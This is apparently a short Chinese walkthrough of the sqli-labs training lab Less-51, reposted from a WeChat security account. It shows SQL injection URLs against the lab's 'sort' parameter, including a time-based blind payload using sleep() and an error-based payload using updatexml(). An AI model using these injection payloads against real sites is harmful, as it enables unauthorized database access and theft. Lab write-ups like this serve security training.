Sqli-labs-Less-51
查找注入点
http://www.web.com/sql/Less-51/?sort=1'报错,并显示我们多了一个'
进行注释
http://www.web.com/sql/Less-51/?sort=1'--+成功,说明存在注入点
方法一时间盲注
判断当前数据库长度
http://www.web.com/sql/Less-51/?sort=1' and if(length(database())=8,1,sleep(2))--+以下步骤与Sqli-labs-Less-50中的时间盲注相同,不同的是对参数的处理
方法二报错注入
查看当前库
http://www.web.com/sql/Less-51/?sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
以下步骤与Sqli-labs-Less-50中的报错注入相同,不同的是对参数的处理
方法三堆叠注入
堆叠注入步骤与Sqli-labs-Less-50中的堆叠注入相同,不同的是对参数的处理
原文始发于微信公众号(龙蜀安全):SQL-Labs Less-51
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论